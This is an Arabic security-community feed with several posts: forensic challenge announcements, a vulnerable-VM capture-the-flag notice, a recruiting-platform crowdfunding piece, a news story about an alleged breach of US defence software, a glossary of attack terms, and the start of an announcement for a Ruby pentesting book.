مرحباً مرة آخرى، اليوم نصل لتحدي مجتمع الحماية العربي الثاني، نتمنى تكونوا قد أستفدتم من التحدي السابق. كل تحدي سيكون أهدافه مختلفة وذلك لنستفيد من المشكلة الموجودة وكيف سنقوم بحلها بواسطة أدواة بسيطة متوفرة للجميع. كذلك سنقوم بجعل كل تحدي أصعب من الذي يسبقه، وبعضها هي التي تفتح لك إمكانية العمل على التحدي الذي بعده، أي لن تستطيع مثلاً أن تعمل على التحدي رقم 3 بدون حل التحدي رقم 2. تحدي اليوم إجباري تجاوزه إن كنت تريد الوصول للتحدي القادم، وذلك لأن القادم يعتمد بالكامل على نجاحك في التحدي الحالي وتجاوزه.

قبل أن أدخل في تفاصيل التحدي، أريد التأكيد على أفكار لتحديات. فإن كانت لديك أفكار لجرائم ممكن يتم تحويلها الى قضايا للدراسة والإستفادة العلمية والتقنية منها، فلا تترددوا إما بإرسالها لنا وسيتم نشرها بإسمكم أو بالتواصل معنا لعملها لبقية زوار ومتابعي الموقع والإستفادة من الأفكار التي فيها.

التحدي رقم (2):
أنت تعمل كمحقق جنائي ألكتروني وشركة S4A أتصلت بك لتقوم بعملية التحقيق على قرص صلب (Hard disk) لموظف مشتبه به يعمل لديهم. قبل أن تصل الى موقع الشركة، قام الموظف بعملية تخريب للقرص الصلب. وظيفتك الأولى هي إصلاح القرص الصلب وذلك لكي تتمكن من تحليله لاحقاً.

الأدلة الجنائية التي معك هي: S4ADFChallenge2.7z، بداخله نسخة عن القرص الصلب الذي يجب أن تقوم بإصلاحه. (كلمة المرور للملف هي: DFI2015)

في ختام التحقيق الذي قمت به، عليك تزويدنا بتقرير يحتوي على ما يلي:
1- ما هو حجم الـ Volume Boot Record أو مختصراً VBR
2- ما هي الـ Offset لكل من:
– النسخة الإحتياطية من قطاع الإقلاع (Backup Boot Sector)
– جزئية FAT1
– جزئية FAT2
3- إثبات على قيامك بإصلاح القرص بشكل سليم (قم بعرض محتويات القرص من خلال إما عمل mount له على لينُكس أو إستخدام FTK Imager)
4- ما هي المنهجية التي أتبعتها للوصول الى الى الحل النهائي
5- ما هي فرضيتك حول ما قام به المشتبه به، ولماذا تعتقد إنه فشل في إنجاز عملية مسح (wipe) للقرص الصلب

ملاحظات مهمة:
1- يجب إستخدام الأدوات المجانية، الحُرة، أو التي كتبتها أنت لحل القضية.
2- إصلاح الـ VBR سوف يقودك الى العلم الأول (Flag #1)
3- مصادر أنصح بقرائتها:
http://www.win.tue.nl/~aeb/linux/fs/fat/fat-1.html
http://www.cgsecurity.org/wiki/Advanced_FAT_Repair

بالتوفيق، ورمضان مبارك على الجميع

تحدي: تحقيق جنائي ألكتروني رقم (3)

$
0
0

أجدد الترحيب بكم ونبدأ على بركة الله التحدي الثالث لمجتمع الحماية العربي، والذي يتركز حول التحقيق في قيام مشتبه به بعمليات إختراق غير شرعية. لكن قبل البدأ في تفاصيل التحدي، أود شكر الأخوة من “نقطة أمن” حول دعمهم للتحدي بجوائز للأخوة المشاركين تضاف الى الجوائز التي يقدمها مجتمع الحماية العربي نفسه. كما أود أن أشكر كل من صرف من وقته سواء القليل أو الكثير للقيام بحل هذه التحديات والتي أسئل الله أن تكون مفيدة لنا جميعاً.

التحدي رقم (3):
بعد أن قمت بإصلاح القرص الصلب بنجاح في التحدي رقم2، الآن مطلوب منك التحقيق في أية أنشطة لها علاقة بالإختراق غير شرعية. لهذا المطلوب القيام بتحليل الأدلة المتوفرة وإعطاء أدلة تثبت بإن المشتبه به قام بنشاط له علاقة بالأختراقات (Hacking)، وإن المشتبه به قام بتخريب القرص الصلب لإخفاء هذه الاعمال.

ملاحظات مهمة:
1- يجب أن تقوم بإصلاح القرص الصلب الذي أستلمته في التحدي رقم 2.
2- نفترض في هذا التحدي صور القطط على إنها صور إباحية وغير شرعية (صحيح لا علاقة بينهما لكن من باب التشبيه ولعدم إمكانية إستخدام صور مخلة بالاخلاق والشرع)

التقرير الذي يجب أن تسلمه يجب ان يكون فيه ما يلي:
1- ما هي الأنشطة التي قام بها المستخدم؟
2- ماهي البرمجيات المشبوهة التي وجدت المستخدم يستخدمها؟
3- هل هناك أية أمور غير شرعية آخرى تم عملها على الجهاز؟ (ملاحظة: في حياتنا العملية كنا سنضطر الى طلب مذكرة تفتيش آخرى لهذا الغرض، ولكن هنا نفترض إن لديك مذكرة تفتيش على كل القضية).
4- ما هي فرضيتك للقضية؟
5- ما هو المنهج المتبع في حل القضية؟
6- هل هناك ملاحظات إضافية تود إضافتها؟

بالتوفيق للجميع.

نتائج تحدّي التحقيق الجنائي الرّقمي

$
0
0

في مجتمع الحماية العربي نسعى الى الارتقاء بالمحتوى العربي على الانترنت وتحديد في أمن المعلومات الرقمية سواء كان ذلك من خلال توفير تغطية لجوانب متعددة في أمن المعلومات. أو عبر نشر تحديات في مواضيع مختلفة بهدف توفير بيئة للشباب لاختبار قدراتهم ووضعها على محط التحدي.

التحدي الاخير كان حول التحقيق الجنائي الرقمي وهو موضوع قل ما يطرح عربيا. التحدي كان من وضع زميلنا الدكتور علي الشّمري والذي يعتبر من روّاد هذا المجال عربياً.

قبل أن نعلن اسماء الفائزين بهذا التحدي نود أن نشكر جميع من شاركنا في هذا التحدي سواء عبر ارسال حلول أو عبر دعمنا بنشر التحدي ونخص بالذكر الإخوة في نقطة أمن على دعمهم لنا عبر تقديهم جائزة المركز الثالث.

تلقينا العديد من الحلول الرائعة والتي تظهر قدرات كبيرة وخبرات عالية لدى الشباب العربي. الإجابة التي حازت على تقديرنا الشديد كانت للاخ علي خوجه والذي شارك في كافة مراحل التحدي وكانت اجاباته تفصيلية ورائعة ولهذا اخترناها لتكون الاجابة التي سنقدمها للجميع لهذا التحدي.

يمكن تحميل إجابة الاخ علي خوجه من هنا.

المركز الثاني فاز به الاخ علي خلفان حيث قام بحمل جميع مراحل التحديث أيضاً وكانت اجاباته رائعة كذلك.

المركز الثالث فاز به الاخوان مصطفى العيسائي ومحمد الغامدي حيث تقدما بحل مشترك لتحدي.

مشاركات رائعة: الاخوة محمد الغامدي ومحمد الجولاني شاركونا حلولهم لبعض مراحل التحدي وليس جميعها ولكن كان حلولهم رائعة فاحببنا ان نذكرهم ونشكر لهم مشاركتنا التحدي.

مرة أخرى نشكر الجميع ونتمنى لكم حظا طيبا في القادم من تحديات مجتمع الحماية.

 

ملاحظة: بخصوص الجوائز للفائزين نرجو من الاخوة التواصل معنا عبر البريد الالكتروني challenges @ security4arabs dot net او بمراسلتنا على توتير @seecurity4arabs


تحدي: تحقيق جنائي ألكتروني رقم (4)

$
0
0

السلام عليكم ورحمة الله وبركاته

مرحباً بجميع زوار مجتمع الحماية العربي هذا أولاً، وأتمنى يضيف هذا التحدي المزيد من المعلومات والأفكار لجميع المشاركين وحتى لللذين سوف يقوموا بقراءة نتائج التحدي في نهاية المشوار. قبل أن أبدأ بشرح فكرة التحدي وما الى ذلك، أود أن أقوم بشكر خاص لجميع الأخوة الذين شاركوا في مسابقة المجتمع الرمضانية السابقة، وبصراحة عملهم الرائع هو من دفعنا الى القيام بإضافة هذا التحدي الجديد.

التحدي رقم (4):
تم إختراق الموقع اللألكتروني لأحدى الشركات، وقام فريق العمل بالذهاب الى الشركة وأخذ صورة جنائية (Forensic Image) من النظام وكذلك الذاكرة وذلك من أحل إجراء التحقيق اللازم. الملفات الخاصة بالجريمة هي:
1- صورة النظام (هنا)
2- صورة ذاكرة النظام (هنا)
3- ملف يحتوي على قيم الـ Hash للملفات (هنا)
password = DFChallenge@s4a

لحل التحدي بنجاح، يجب تسليم تقرير مفصل يجيب على ما يلي:
1- ما هي الهجمات ونوع الهجمات التي قام بها المهاجم؟
2- عدد المستخدمين الذي قام بإضافتهم المخترق، وما هي الآلية التي قام بإضافة كل واحد منهم؟
3- ما هي الملفات، الادوات، المعلومات، الى آخره، من الأمور التي تركها المهاجم خلفه؟ (لنفترض إنه لم يستطع حذفها لضيق الوقت وسرعة وصول فريقنا الى موقع العمل).
4- ما هي البرمجيات المنصبة على النظام وهل تم تنصيبها من قبل المهاجم أم لا؟
5- بإستخدام التحليل الرقمي للذاكرة، هل تستطيع ان تكتشف ما هو نوع الـ shellcode التي تم حقن النظام بها؟
6- ما هو التحليل الزمني (Timeline Analysis) لجميع ما حصل على هذا النظام؟
7- ما هي فرضيتك للقضية، وما هو المنهج المتبع في حل القضية؟
8- هل هناك ملاحظات إضافية تود إضافتها؟

سؤال إضافي (BONUS):
ما هي الملفات أو المجلدات التي قام بإنشاءها المهاجم على النظام؟ عدد جميعها مع ذكر أدلة تثبت صحة ذلك.

ملاحظات مهمة:
يجب أن يتم حل القضية بإستخدام أدوات مجانية أو حُرة بالكامل، وأن لا يتم إستخدام أدوات تجارية.

بالتوفيق للجميع.

ENGLISH Version:
Digital Forensic Challenge #4:
A company’s webserver has been breached through their website. Our team arrived just in time to take a forensic image of the running system and its memory for further analysis. The files can be found below:
1- System Image: here
2- System Memory: here
3- Hashes: here
4- Passwords = DFChallenge@s4a

To successfully solve this challenge, a report with an answers to the tasks below is required:
1- What type of attacks has been performed on the box?
2- How many users has the attacker(s) added to the box, and how were they added?
3- What leftovers (files, tools, info, etc) did the attacker(s) leave behind? (assume our team arrived in time and the attacker(s) couldn’t clean & cover their tracks)
4- What software has been installed on the box, and were they installed by the attacker(s) or not?
5- Using memory forensics, can you identify the type of shellcode used?
6- What is the timeline analysis for all events that happened on the box?
7- What is your hypothesis for the case, and what is your approach in solving it?
8- Is there anything else you would like to add?

Bonus Question:
what are the directories and files, that have been added by the attacker(s)? List all with proof.

Important Note:
The case MUST be solved using open source and free tools only (NO EnCase, FTK, etc) are allowed.

Good luck…

تحدي : تطبيق الويب Hisoka

$
0
0

تحدي Hisoka هو هو عبارة عن تطبيق  Web  يعمل على نظام تشغيل Linux. يحتوي التطبيق على بعض الثغرات المترابطة لكي تصل إلى النظام و الحصول على المستخدم الجذر root. يجب تثبيت برنامج VMware Workstation الإصدار 10 أو الأحدث للتشغيل

طريقة تشغيل الجهاز الوهمي

  • بعد اكتمال تحميل جميع الأجزاءالمضغوطة (من هنا)  و فكها
  • قم بعمل استيراد (Import) لملف OVA
  • شغل الجهاز الوهمي وابدأ التحدي

الهدف النهائي هو الحصل على الملف proof.txt الموجود في المسار  /root/ 

صور متفرقة من الجهاز الوهمي Hisoka

hisoka2

hisoka1

 

بالتوفيق للجميع,,

Cyber Talents اول منصة عربية لتوظيف المواهب في الأمن السيبراني عن طريق المسابقات والاختبارات التقنية

$
0
0

cyber-talents

العديد من المبرمجين في الوطن العربي قاموا بالمشاركة في مسابقات البرمجة الدولية التي تقام علي مستوي العالم سواء

كانت Google Jam اوFacebook Hacker اومسابقة ACM الشهيرة لطلبة الجامعات . يعلم المشاركون في هذه المسابقات انه بمجرد وصولك للمسابقة العالمية فان عروض التوظيف تنهال عليك من جميع الشركات العالمية بالاف الدولارت شهريا.وهذا امر طبيعي فكل طالب قد تم وضعه في اختبارت و تحديات عملية استطاع من خلالها اثبات نفسه واثبات مهاراته سواء علي نطاق جامعته او حتي بلده مما يجعل هذه المسابقات مقصد الشركات العالمية كل عام

ولكن يظل عدم وجود مسابقة قارية او عالمية بهذا الحجم في مجال الامن السيبراني هو مشكلة تحتاج الي حل. معتز صلاح وادهم محمد بداوا حملة تمويل جماعي علي موقع ذومال من اجل حل مشكلة النقص الحاد في العاملين بمجال الامن السيبراني عن طريق انشاء اول منصة عربية لتقييم وتوظيف المواهب في مجال الامن السيبراني من خلال المسابقات التقنية و اطلقوا عليها اسم Cyber Talents .

تقام الاختبارات التقنية التفاعلية سواء علي نطاق فردي او علي نطاق اقليمي . كل مستخدم لديه حسابه الخاص الذي يقوم من خلاله بحل مئات التحديات في مجالات الامن السيبراني المختلفة مثل امن الشبكات , امن المواقع , الهندسة العكسية , التشفير وغيرها الكثير. كلما استطاع كل مستخدم حل عدد اكبر من التحديات المختلفة كلما ارتفع ترتيبه علي المستوي الدولي او الاقليمي . عن طريق نفس المنصة سيكون من السهل علي  الشركات التي تسعي لتوظيف هذه المهارات الوصول الي افضل الكفاءات بعد ان تم تقييمهم و مرورهم بهذه التحديات المختلفة. الهدف من Cyber Talents  ان يكون هوالمجتمع الذي يجمع افضل المواهب في مجال الامن السيبراني علي مستوي الوطن العربي كبداية و علي مستوي العالم كخطوة ثانية .

بسؤال معتز صلاح مؤسس Cyber Talents قال ان الدافع الرئيسي لانشاء Cyber Talents هو ان الشركات تعاني من نقص شديد في ايجاد المهارات المطلوبة في هذا المجال و ليس بسبب نقص الافراد ولكن بسبب انه لايوجد وسيلة لربط اصحاب المهارات باصحاب الشركات. بالاضافة ان اساليب التوظيف الحالية لهذه الوظائف غير دقيقة ولاتلائم طبيعة العمل الذي يعتمد بالمقام الاول علي مهارات الشخص التقنية مما يجعل الشركات تعاني في ايجاد الشخص المناسب . فليس من المنطقي ان يمر المتقدم علي اختبارات لغة اجنبية لعدة ساعات و اختبارات موارد بشرية لعدة ساعات اخري ثم يكتفي الجزء التقني فقط بمقابلة مع مديره المباشراما لعدم وجود الاختبارات التقنية الكافية لدي الشركة التي قد تحتاج الي معمل و اجهزة وشبكة منفصلة و غيرها من البنية التقنية المكلفة او بسبب ان انشاء هذه الاختبارات يحتاج الي مهارة معينة ربما لا تكون موجودة في شركات التوظيف.

Cyber Talents هو مشروع فريد من نوعه في مجال الامن السيبراني ويهدف الي بناء جيل جديد من المواهب والمهارات تستطيع حماية البنية التحتية لاوطاننا العربية التي اصبحت تدارمعظمها اليكترونيا بدءا من محطات الكهرباء والمياه مرورا بمنظومة المواصلات و الطيران مرورا بالمنظومة البنكية والمصرفية التي تشتمل علي بطاقات الائتمان وغيرها . ومع تطور التكنولوجيا السريع في الخمس سنوات السابقة اصبح من الواجب علينا ان يواكب هذا تطورا مماثلا في مهارات الافراد و هذا مايحاول Cyber Talents توفيره.

المشروع سيبدا اطلاقه التجريبي بنهاية هذا العام و ويحتاج فريق العمل لدعمكم . لمعرفة التفاصيل عن المشروع و خطواته الضغط علي الرابط التالي :

http://www.zoomaal.com/projects/48486?ref=38627481

كيف إستطاعت المخابرات الروسية إختراق وزارة الدفاع الأمريكية منذ عام 2008

$
0
0

DISA

Defense Information Systems AgencyDISA

أو ما يعرف ب وكالة نظم المعلومات التابعة لوزارة الدفاع الأمريكية, والتي تعمل بمثابة منظومة الإتصالات ونظم المعلومات الخاصة بوزارة الدفاع والتي تقوم بتجميع البيانات الهامة والحساسة من مصادر مختلفة لهدف واحد, هو توفير الدعم للقوة العسكرية الأمريكية في صورة متخذي القرار بدأ من الرئيس الأمريكي, مرورا بمستشاريه ووزير الدفاع حتي الجنود في ساحة المعركة.

لكي تقوم هذه الوكالة بعملها من تجميع هذا الكم الهائل من البيانات وتقديمة بشكل مناسب لكل الجهات السابق ذكرها, فإنهم بالطبع يحتاجون لمشاريع برمجية عملاقة لكي تقوم بتجميع البيانات بشكل أوتوماتيكي من كل المصادر المتاحة ثم تقوم عن طريق الذكاء الإصطناعي أو عن طريق برمجيات معدة مسبقا من إستخراج المعلومات المهمه وتقديمها للجهات المعنية السابق ذكرها,

بالطبع مشاريع بهذا الحجم ﻻ يمكن لوزارة الدفاع الأمريكية بكل مشغولياتها من توفير فرق متخصصة لبرمجة هذه المشاريع, لذلك يعتمد الجيش الأمريكي علي شركات خارجية متخصصة في برمجة مثل هذه الأنظمة وهذه الشركات تعمل فقط لصالحة وزارة الدفاع الأمريكية في برمجة أنظمة الإتصالات العسكرية.

أحد هذه الشركات والتي يملكها John C. Kingsley قامت في العام 2010 بتوظيف مبرمجين روسيين للعمل لديها في برمجة عدة برامج خاصة بوكالة نظم المعلومات التابعة لوزارة الدفاع الأمريكية,

وبالفعل تم صدور البرامج المطلوبة وتم تنصيبها داخل ما يسمي بالشبكات الآمنة والتي يفترض أنها تحتوي علي السرفرات(الخوادم) التي تحمل البيانات السرية التابعة للوكالة دون علمهم بما تحويه هذه البرمجيات من برمجيات خبيثة أخري ﻻ حصر لها, حتي أن Patrick Malone وصف الأمر ب اوكازيون الفيروسات Viruses occasion !!

وبهذه الطريقة إستطاع الروس الوصول إلي قلب وزارة الدفاع الأمريكية بكل ما تحويه أنظمتهم من أسرار وإتصالات علي مدار الساعة!

secret

عوده بالتاريخ إلي الوراء قليلا .. حيث العام 2008 …

قامت وزارة الدفاع الأمريكية بعرض مشروع تبلغ قيمته المادية 22 مليون دولار علي بعض الشركات التابعة لها كما سبق ذكره في بداية المقال ..

المشروع يتلخص في تأمين وإدارة الشبكات العسكرية التابعة لوكالة DISA بما يشمله ذلك من برمجيات إدارة إلكترونية .. مشاريع بهذه الحساسية والضخامة تتطلب مبرمجين بمهارات إستثنايئه …

الروس معروفين عالميا ببراعتهم البرمجية علي مختلف منصات ولغات البرمجة بل وبراعتهم في كل ما يتعلق بالتكونولوجيا وعلوم التشفير,

قام ثلاثة من المبرمجين الروس بتقديم سيرتهم الذاتية CV إلي أحد الشركات العاملة بهذا المشروع وطلبوا راتب يساوي ثلث ما يطلبه المبرمجين الأمريكيين في وظيفة كهذه, بالطبع ما تحويه سيرتهم الذاتية من مهارات إستثنائية وسابقة أعمال ﻻ مثيل لها بالإضافة إلي راتب ضئيل هو أمر مغري لصاحب هذه الشركة كي يقبلهم للعمل لديه .. وقد كان!

شهر يناير من العام 2011 …

حيث تم إكتشاف برمجيات خبيثة تعمل داخل الشبكات الحساسة التابعة للوكالة, تم التكتم علي الأمر حتي عمل الفحوصات اللازمة للشبكات والأجهزة العاملة بالوكالة .. كانت نتيجة البحث أن إختراق هذه الأنظمة تم عن طريق البرمجيات التي قامت ببرمجتها شركة NetCracker في ذلك المشروع من العام 2008 .. وشركات أخري ساهمت في هذا المشروع في أوقات لاحقه!

قامت الوكالة برفع قضية ضد كل الشركات التي ساهمت بالعمل في هذا المشروع وتم تقديم مدراء الشركات للمحاكمة ..

هذه القضية دامت في المحاكم الأمريكية طيلة أربع سنوات متواصلة إلي أن تم الحكم فيها في شهر نوفمبر من هذا العام 2015 ..

مجمل أحداث القضية كانت كالتالي:

1- Computer Sciences Corporation والمتورطة أيضا في هذه القضية بإستئجار مبرمجين روسيين للعمل لديها, تقاضت مبلغ وقدره  واحد ونصف مليار دولار من وزارة الدفاع الأمريكية نظير المشاريع البرمجية التي تقدمها لوزارة الدفاع ووكالة ال  !DISA

2- المبرمجين الروسيين اللذين عملوا لدي الشركات المتورطة في هذه القضية قد شاركوا في كتابة برامج دخلت حيز الخدمة في:

وكالة نظم المعلومات التابعة لوزارة الدفاع الأمريكية DISA, سلاح الطيران الأمريكي, General Services Administration إدارة الخدمات العامة.

3- علي مدار أربع سنوات من المحاكمة وتقديم الإدعاءات والأدلة ونفيها, لم يستطع محاموا الجهات المتضررة من إلحاق تهمة الخيانة أو التورط بالجاسوسية إلي أي من أصحاب الشركات المتورطة في هذة العملية, وتم الإتفاق علي التعويض! حيث ستقوم الشركات المتورطة بدفع مبالغ مالية للجهات المتضررة كتعويض عن الخسائر التي لحقت بشبكاتها والبنية التحتية التي تضررت من جراء تلك الإختراقات.

المصدر الأصلي.

جملة من الكاتب في نهاية المقال:

” ليس من العيب أو الخطر أن يتم إختراقك أو إختراق شبكاتك, فهذا يحدث طيلة الوقت لأقوي الشركات, لكن الخطر الأكبر, هو أن لا تكتشف أصلا أنه تم إختراقك!”

تعريفات هامة بأشهر مصطلحات أمن المعلومات والفرق بينها

$
0
0

السلام عليكم ورحمة الله وبركاته

كثيرا ما يكون لدي البعض إلتباس حول مصطلحات مثل Phishing و Spear Phishing او حول Targeted Attack و APT وغيرها

لذا إن شاء الله في هذه التدوينة سأشرح أهم مصطلحات أمن المعلومات لكي يكون المعني واضح تجاهها.

ملحوظة: تعمدت كتابة المصطلحات باللغة الإنجليزية لأنها لابد أن تحفظ كما هي :)

phishing

1- ما الفرق بين Phishing, Vishing, Spear Phishing, Spam؟

Spam: هي رسائل دعائية يتم إرسالها بكميات كبيرة أو إلي عدد كبير من ال Emails بغرض دعائي, مثلا دعايه لبرمجيات معينه او منتجات معينه إلخ.

Phishing: هي رسائل إحتيال إلكتروني يتم إرسالها أيضا إلي كميات كبيرة من ال Emails بشكل عشوائي بغرض سرقة حساباتهم البنكية او بطاقات الإئتمان Credit Cards أو كلمات المرور الخاصة بهم أو طلب من المستخدم أن يفتح ملف معين بغرض إختراق جهازه.

Spear Phishing: هو نفسه ال Phishing ولكن الفرق هنا أن ال Spear Phishing يتم إرساله إلي أهداف معينه ومحدده ويتم إرساله بشكل مدروس وليس عشوائيا, مثال إذا كان أحد المخترقين يستهدف شركة بعينها فإنه يقوم بعملية بحث علي مواقع التواصل مثل LinkedIn وغيرها وينتقي موظفين في وظائف معينة داخل الشركة ويقوم بإنتحال شخصية أحدهم لإرسال رسائل إلي زملائه في الشركة حتي يكسب ثقتهم في فتح ملفات معينه تسمح للمخترق بالتحكم في أجهزتهم او بسرقة كلمات المرور الخاصة بهم.

Vishing: هو نفس فكرة عمل ال Phishing لكنه يتم من خلال الإتصال بهاتف الضحية Voice Phishing حيث يقوم الهاكر بالإتصال بهاتف الضحيه من أي خدمة إتصال من خلال الإنترنت وينتحل صفة البنك او شركة الإتصالات إلخ ويطلب من الضحيه بياناته الشخصية والتي ستساعده فيما بعد في الوصول إلي حسابات الضحية.

apt

2- ما الفرق بين ال Targeted Attack, State Sponsored Attack, APT, Zeroday Attack ؟

Zeroday Attack: (شكرا إبراهيم مسعد علي التعديل)

تطلق كلمة Zeroday علي الثغرات التي تصيب تطبيقات معينة وتكون الثغرة غير منتشرة علي الإنترنت والشركة صاحبة التطبيق المصاب لديها 0 أيام لإصدار ترقيع للثغرة قبل نشرها علي الإنترنت وفي بعض الأحيان حتي الشركة صاحبة التطبيق تظل لشهور أو سنوات لا تعلم عن الثغرة شئ.

it often takes not just days but months and sometimes years before a developer learns of the vulnerability that led to an attack.

مثال: هاكر صيني إكتشف ثغرة في ال Microsoft Office تمكنه من إختراق أي جهاز يستخدم هذا التطبيق بمجرد فتح ملف وورد ينتهي ب .doc او .docx

وبالطبع بما أنها ثغرة ZeroDay فهذا يعني أنه لا يمكن إكتشافها بواسطة برامج ال AntiVirus وليس لها أي سجل او بصمة Hash علي الإنترنت.

نفس المفهوم ينطبق أيضا علي ثغرات تطبيقات الويب مثل WordPress, Joomla وغيرهم وليس فقط ال Client Side Applications مثل Office, flash وغيرها.

APT :APT هي إختصار ل Advanced Persistent Threat وهي تطلق علي المخترقين اللذين يقومون بإستخدام برمجيات متطورة ومتقدمة تسمح لهم بالبقاء داخل شبكات الشركات وأجهزتها لمدة طويلة جدا دون أن يتم إكتشافهم وهؤلاء النوعية من المخترقين غالبا ما يستخدمون ثغرات  من نوعية ال Zeroday لكي يقوموا بعملية الإختراق وزرع ال Backdoors الخاصة بهم داخل أجهزة وشبكات الشركات التي يقومون بإختراقها.

State Sponsored Attack: المخترقين اللذين يطلق عليهم كلمة State Sponsored هم المخترقين اللذين يعملون تحت مظلة الأجهزة الحكومية والإستخباراتية التابعة لبلادهم ويتم دعمهم ماديا وخططيا وعدديا ومعلوماتيا من تلك الجهات الحكومية/الإستخباراتية, وبما أن هؤلاء المخترقين هدفهم دائما هو البقاء داخل شبكات الجهات التي قاموا بإختراقها لأطول فترة فإنهم يطلق عليهم لقب ال APT الذي تم شرحه بالأعلي ودائما ما يستخدمون ثغرات من نوعية Zeroday في إختراقاتهم.

أهداف ال State Sponsored Attackers دائما ما تكون أهداف حكومية, عسكرية, إستخباراتية أو حتي أهداف سياسية.
مثال علي ذلك, فريق المخترقين التابع لوكالة الأمن القومي الأمريكي NSA واللذين تم تلقيبهم ب Equation Group  حيث قاموا بإختراقات لأهداف حكومية وإستخباراتية وعسكرية علي مدي أكثر من عشر سنوات, وكان من ضمن ضحاياهم (بحسب ذكر شركة Kaspersky) الجيش الليبي وشركة الإتصالات اليمنية وأحد شركات الطاقة بالجزائر.

equ

مثال آخر علي ال State Sponsored Attackers المجموعة الروسية الشهيرة بلقب APT28 والوحدة 8200 في الجيش الإسرائيلي التي قامت ببرمجة فيروس Stuxnet

وال PLA التابع للجيش الصيني وغيرهم.

Targeted Attack: كما هو موضح من إسمه, هو إختراق يستهدف شركة معينة لكنه لا يستهدف جهات حكومية مثل ال State Sponsored وغرض هذا الإختراق دائما هو سرقة البيانات من الشركات بهدف بيعها والربح منها أو إستخدامها فيما بعد لأغراض أخري مثل سرقة البطاقات الإئتمانية وأموال المستخدمين.

مثال علي ذلك إختراق أحد الشركات العاملة في مجال البورصة لسرقة أموال ال Bitcoin التي يتم تداولها من خلال هذه الشركة.

مثال آخر, إختراق أحد شركات الألعاب الشهيرة لسرقة الكود المصدري Source Code الخاص بها وبيعه لشركة اخري منافسه لها.

مثال ثالث, إختراق موقع تابع لبنك معين لسرقة بيانات من قاعدة بياناته ويتم إستخدامها فيما بعد للإحتيال علي مستخدمي هذا البنك لسرقة أموالهم.

q

والآن إليك عزيزي القارئ هذه الأسئله, برجاء الرد عليها بناء علي ما قرأته في هذا المقال:

1- المخترق X قام بإنتحال شخصية أحد موظفي الشركة Y وقام بإرسال ملف pdf يحتوي علي ثغرة تم الإعلان عنها مسبقا لكنه قام بتشفيرها من جميع برامج الحماية, من وجهة نظرك, هل هذه الثغرة يتم تصنيفها ك ZeroDay بما أنها عالية الخطورة وغير مكتشفة من أي برنامج حماية وتصيب تطبيق يستخدمه ملايين الأشخاص, نعم أو لا؟ وتحت أي تصنيف يقع هذا المخترق من بين التصنيفات التي تم ذكرها بالأعلي؟

2- المخترق X قام بإختراق الشركة Y وقام بزرع RootKit داخل سرفرات الشركة لكي يتمكن من التحكم الكامل بها لفترة طويلة دون أن يتم إكتشافه, تحت أي تصنيف يقع هذا النوع من الإختراق؟

3- مؤخرا حدث صدام ما بين تركيا وروسيا بسبب إسقاط تركيا لطائرة روسية, بعدها بأيام أعلنت تركيا عن أن أنظمتها البنكية Online Banking تحت هجوم عنيف من الهكرز واللذين تم تتبعهم لتجد تركيا أن مصدر الإختراقات قادم من روسيا, في رأيك, هل هذا State Sponsored Attack ام Targeted Attack ؟

انطلاق مشروع كتاب Rubyfu للغة Ruby لمختبري الاختراق

$
0
0

rubyfu

نبذة عن الكتاب

اليوم نعلن رسميا عن انطلاق مشروع الكتاب المفتوح Rubyfu والمختص بالمهارات البرمجية في لغة الـ Ruby لمختبري الاختراق. فكرة الكتاب تختلف عن الكتب الأخرى من حيث عرض المحتوى والفئة المستهدفة وطريقة تطوير الكتاب. هذا الكتاب يستهدف المختصين في الختبار الاختراق (Hackers) بشكل عام والمُلمين بلغة Ruby حيث يضع بين يديك كل ما تحتاجه يوميا من مهارات برمجية لتوفير وقت وجهد البحث عن كيفية عمل سكريبت يقوم بمهمة خاصة بلغة ال Ruby. يتميز الكتاب بقلة الكلام و الدخول في الطبيق مباشرة مع وضع بعض التوضيح إن لزم الأمر. من جانب خبرة, لا يحتاج الهاكر لكتاب 200 صفحة لفهم ماهو الـ Socket لكي يقوم بكتابة سكريبت طوله 20 سطر لينجز عمله. هذا الكتاب يسمح لك بالتركيز على الهدف الذي تريد اختراقه ويوفر لك البداية السريعة لكتابة السكريبت الذي يحقق الهدف. نعم فهذا الكتاب لا يعطيك معلومة بل يعطيك خبرة.

مفتوح المصدر

نعم الكتاب مفتوح المصدر, ويسمح لك بالمشاركة فيه ككاتب أو مشارك في الكتاب والذي بالتبعية سيضيف اسمك إلى قائمة المشاركين الموجودة في أخرالكتاب لحفظ مجهوداتك. هناك طرق عدة للمشاركة:

  • إضافة مواضيع جديدة
  • تحسين الأكواد الحالية أو إضافة طرق أخرى لأكواد موجودة
  • تحسين وترتيب الكتاب
  • اقتراحات و اسئلة
  • الإبلاغ عن أخطاء لغوية أو برمجية
  • نشر الكتاب
  • دعم الكتاب ماديا (يذهب الدعم على تحسين جودة الكتاب)

جاء الكتاب بطابع المشاريع البرمجية أكثر من الطابع المألوف عن إصدار الكتب لكي نضمن اسمرارية تطوير المعلومة, فالكتاب لن يتوقف محتواه على ما ستجده وقت إطلاقه ونشره للعامة.

رخصة الكتاب (CC BY-NC-SA)

بعد بحث واستشارة الكثير من المهتمين بالحقوق الفكرية, وجدنا أن الرخصة Attribution-NonCommercial-ShareAlike CC BY-NC-SA هي الأنسب حيث تسمح للمجميع بالمشاركة وإعادة النشر والتطوير على الكتاب مع حفظ حقوق المشاركين الكتاب, كما أنها تمنع الاستخدام التجاري للكتاب لتفادي أي مشاكل تتعلق بهذا مع أي أحد ولكي لا نظلم القرّاء والمشاكين في الكتاب على حد سواء فالأصل في الكتاب نشر المعرفة وليس التكسب.

أقسام الكتاب

يحتوي الكتاب على 6 وحدات(Modules) تتفرع تحتها المواضيع المتعلقة بها بشكل سهل وبأقل كلام وأكثر تطبيق ممكن.

  • Module 0x0 | Introduction

بداية هادئة للقارئ, الكاتب أو اي شخص أحب أن يطلع على الكتاب بشكل عامل. هنا ستجد بعض التفاصيل عن كفيفة البدء بالمشاركة في الكتاب بك أنواعها.

  • Module 0x1 | Basic Ruby KungFu

تجميعة جميلة وسريعة عن أكثر المهارات المطلوبة في التعامل مع الـ Strings في حياة مخبرين الاختراق و كيفية التلاعب بها. إذا كنت متخصص في مجال اختبار الاختراق فستزور هذا القسم بشكل يومي تقريبا.

  • Module 0x2 | System KungFu

هنا ندخل بشكل أعمق إلى التعامل مع أنظمة التشغيل من الحصول على سطر أوامر على الأنظمة وتشفير البيانات والتلاعب بالملفات وغيرها.

  • Module 0x3 | Network KungFu

هنا كل ما تحتاجه في التعامل مع بروتوكلات الشبكات و التلاعب بها. كما ستتعرف على كيفية بناء/صناعة الحزم بنفسك من البداية وحتى إرسالها إلى كارت الشبكة.

  • Module 0x4 | Web KungFu

